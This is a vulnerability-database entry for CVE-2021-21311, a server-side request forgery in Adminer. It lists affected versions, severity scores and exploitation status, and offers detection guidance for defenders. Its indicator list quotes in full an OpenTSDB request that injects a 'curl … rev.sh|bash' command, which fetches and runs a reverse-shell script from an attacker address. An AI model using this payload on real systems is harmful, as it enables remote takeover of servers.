cbcvebase.
CVE-2021-21311
published 2021-02-11

CVE-2021-21311: Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery…

PriorityP185high7.2CVSS 3.1
AVNACLPRNUINSCCLILAN
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2025-10-20
Exploited in the wild
EPSS
90.46%
99.8th percentile
Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.

Affected

12 ranges
VendorProductVersion rangeFixed in
admineradminer>= 0 < 4.7.9-14.7.9-1
admineradminer>= 0 < 4.7.9-14.7.9-1
admineradminer>= 0 < 4.7.9-14.7.9-1
admineradminer>= 0 < 4.7.9-14.7.9-1
admineradminer>= 0 < 4.2.1-1ubuntu1+esm14.2.1-1ubuntu1+esm1
admineradminer>= 0 < 4.6.2-1ubuntu0.1~esm14.6.2-1ubuntu0.1~esm1
admineradminer>= 0 < 4.7.6-1ubuntu0.1~esm14.7.6-1ubuntu0.1~esm1
admineradminer>= 4.0.0 < 4.7.94.7.9
debianadminer< adminer 4.7.9-1 (bookworm)adminer 4.7.9-1 (bookworm)
debiandebian_linux
vranaadminer
vranaadminer>= 0 < 4.7.94.7.9

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://localhost:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=[33:system('curl${IFS}http://10.10.14.14:8000/rev.sh|bash')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
path/var/www/adminer/plugins/data/servers.php
  • The SSRF exploit works by triggering a 301 redirect from an attacker-controlled HTTP server; monitor for outbound HTTP requests from the Adminer server to attacker-controlled IPs, particularly with Authorization: Basic headers
  • The SSRF is triggered via the `server` POST parameter in Adminer login requests; detect POST requests to Adminer with non-localhost or external values in the `auth[server]` field
  • Exploitation chains the Adminer SSRF (CVE-2021-21311) with OpenTSDB RCE (CVE-2020-35476) via the `yrange` parameter containing a `system()` call; detect HTTP requests to OpenTSDB `/q` endpoint with `yrange` containing shell metacharacters
  • Adminer SSRF affects versions 4.0.0 through 4.7.8 (all-drivers bundle adminer.php); detect presence of Adminer versions below 4.7.9 via HTTP response headers or page content
  • The SSRF allows unauthenticated attackers to redirect Adminer to internal services; monitor for Adminer processes making connections to internal/RFC1918 addresses or link-local addresses (e.g. 169.254.169.254)
  • ·Only Adminer installations using the all-drivers bundle (adminer.php) are vulnerable; single-driver builds are not affected
  • ·The exploit PoC (ssrf.py) requires the attacker to run a listener HTTP server that issues a 301 redirect to the internal target; the attacker host must be reachable from the Adminer server

CVSS provenance

nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
nvdv2.06.4MEDIUMAV:N/AC:L/Au:N/C:P/I:P/A:N
osv7.2HIGH
vulncheck7.2HIGH
cisa7.2HIGH
vendor_debian7.2HIGH
vendor_ubuntu6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.